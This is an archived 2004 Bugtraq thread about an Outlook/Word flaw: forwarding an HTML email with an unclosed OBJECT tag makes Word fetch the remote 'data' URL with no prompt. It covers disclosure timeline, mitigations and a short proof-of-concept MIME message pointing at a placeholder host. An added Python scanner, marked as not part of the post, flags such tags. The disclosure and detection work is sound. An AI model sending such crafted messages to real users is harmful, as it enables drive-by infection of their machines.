Bugtraq mailing list archives

RE: Microsoft Word Email Object Data Vulnerability


From: "Drew Copley" <dcopley () eEye com>
Date: Fri, 9 Jul 2004 10:58:18 -0700

How did you find this? Did someone email this to you? Did
you discover this variation? 

(Being that the original bug was mine, I have some interest
in a new variation being exploited by spammers... especially
if it was genuinely found in the wild.)

And, why is Microsoft ignoring this bug? If you forward
the email it will work (with Word as the editor...)? Yes, 
that may not be a critical variation, but with proper social 
engineering, it would fool some people... especially the 
many who love to forward things such as "Bill Gates will 
buy you a new cell phone if you forward this email"...



-----Original Message-----
From: James C. Slora, Jr. [mailto:james.slora () phra com] 
Sent: Thursday, July 08, 2004 12:52 PM
To: bugtraq () securityfocus com; Windows NTBugtraq Mailing List
Subject: Microsoft Word Email Object Data Vulnerability

==============================================
Microsoft Word Email Object Data Vulnerability
==============================================


==============================================
Summary:
==============================================
Outlook 2000 and 2003 allow execution of remote web pages specified
within the data property of OBJECT tags when there is no closing /OBJECT
tag, while forwarding an HTML email message using Word 2000 or 2003 as
the email editor. This behavior happens regardless of Security Zone
settings - it completely ignores them.

Spammed exploits are very much in the wild and are affecting systems
even if the bug is beyond the scope of the spammers' original intent. 

==============================================
Vendor notification: 
==============================================
June 8 - email to secure () microsoft com (no response)
June 14 - email again to secure () microsoft com, initial response came
same day
June 15 through July 2 - Several messages back and forth
July 2 - final and detailed response from Microsoft
Result: They consider it a variation of web bug behavior, and may take
care of it in future Office releases if they decide to modify Outlook's
download behavior when forwarding and replying.
 
**********************
Disclaimer: Testing was very limited. There are probably mistakes and
holes in my analysis, and this all needs to be reviewed further. Use at
your own risk, no liability for misuse, etc.
**********************

==============================================
Severity: 
==============================================
I consider it at least moderate because large volumes of spam easily
overcome long odds of exploiting it in any given case. Plus because many
people believe they are immune to old-fashioned OBJECT data exploits if
they are up to date on their patches. Plus the apparent Security Zone
bypass side of it may indicate additional more serious risks in Word
email.

==============================================
Products tested
==============================================
Affected:
Outlook 2003 with MS Word 2003 as the email editor on XP Pro SP1
Outlook 2000 with MS Word 2000 as the email editor on Win2K Pro SP4

Not affected:
Outlook 2003 with its own email editor on XP Pro SP1 
Outlook 2000 with its own email editor on Win2K Pro SP4

Not tested:
No other configurations tested.

==============================================
Details:
==============================================
The OBJECT tag gets processed on any version of Outlook but blocks
ActiveX controls if it is up to patch rev (anything since 2000) with
default Restricted Zone settings. This is working fine on the affected
system until one specific scenario:

When using MS Word as the email editor and forwarding an HTML email
message containing an OBJECT tag with no closing /OBJECT, MS Word
downloads the page referred to in the "data" property of the OBJECT with
no prompt to the user.

So if the user forwards a spam message to someone (such as their mail
administrator), the user may infect their own computer.

This only works when forwarding a message - not when replying. It also
only appears to work if the OBJECT tag is not closed with a /OBJECT.

==============================================
Fix:
==============================================
None available AFAIK

==============================================
Mitigators:
==============================================
- Don't use Word as the email editor
- Don't forward spam messages, just forward headers or source from
Tools>Options
- Filter HTML mail containing OBJECT tags, whether enclosed by HTML tags
or not, and especially if there is no closing /OBJECT

Those mitigators stop the execution of the OBJECT data reference

Frequently suggested mitigators that do not help so much:
- Removing the HTA MIME-Type, and killbitting the adodb.stream and
shell.application controls, do not help.
- Outlook Restricted Zone settings do not help.
- Locking down the My Computer security zone does not help.

Those mitigators don't stop execution but may help stop secondary
exploits that might be hosted at the OBJECT data reference.

==============================================
Proof of concept:
==============================================
Check your spam for OBJECT tags that call Web URLs. This stuff is
everywhere. Here is the basic idea:

MIME-Version: 1.0
Content-Type: multipart/alternative;
      boundary="--001"

----001
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

|object data=3D"http://www.foobar.foo/page.php";|

----001--
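The filtering mitigator above, as an added example that is not part of the original post: a small Python scanner that decodes the text/html parts of a message, finds every OBJECT tag, and reports whether its data attribute points at a web URL and whether the tag is ever closed. The sample message is constructed here to mirror the proof of concept (the foobar.foo URL is the advisory's placeholder, not a real indicator).

```python
import re
from email import message_from_string, policy

# Constructed sample modelled on the advisory's proof of concept:
# quoted-printable HTML part, OBJECT with a remote data URL, no </object>.
SAMPLE_MAIL = """\
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="--001"

----001
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<p>Hello</p><object data=3D"http://www.foobar.foo/page.php">

----001--
"""

OPEN_RE = re.compile(r"<object\b([^>]*)>", re.I)
CLOSE_RE = re.compile(r"</object\s*>", re.I)
DATA_RE = re.compile(r"""\bdata\s*=\s*["']?\s*(https?://[^"'\s>]+)""", re.I)

def scan_html(html):
    """Return one dict per OBJECT tag: remote data URL (or None) and whether
    a closing </object> appears before the next OBJECT opener."""
    opens = list(OPEN_RE.finditer(html))
    results = []
    for i, m in enumerate(opens):
        limit = opens[i + 1].start() if i + 1 < len(opens) else len(html)
        closed = CLOSE_RE.search(html, m.end(), limit) is not None
        data = DATA_RE.search(m.group(1))
        results.append({"url": data.group(1) if data else None, "closed": closed})
    return results

def scan_message(raw):
    """Walk the MIME tree; get_content() undoes quoted-printable/base64 so
    data=3D"..." is seen as data="..."."""
    msg = message_from_string(raw, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            hits.extend(scan_html(part.get_content()))
    return hits

def verdict(raw):
    hits = scan_message(raw)
    if not hits:
        return "pass"
    if any(h["url"] and not h["closed"] for h in hits):
        return "quarantine"  # the exact shape the advisory describes
    return "flag"            # any OBJECT tag in mail is still worth a look
```

Run as a gateway filter, "quarantine" covers the remote-data, unclosed case that Word fetches on forward, while "flag" catches the broader class the mitigator recommends filtering.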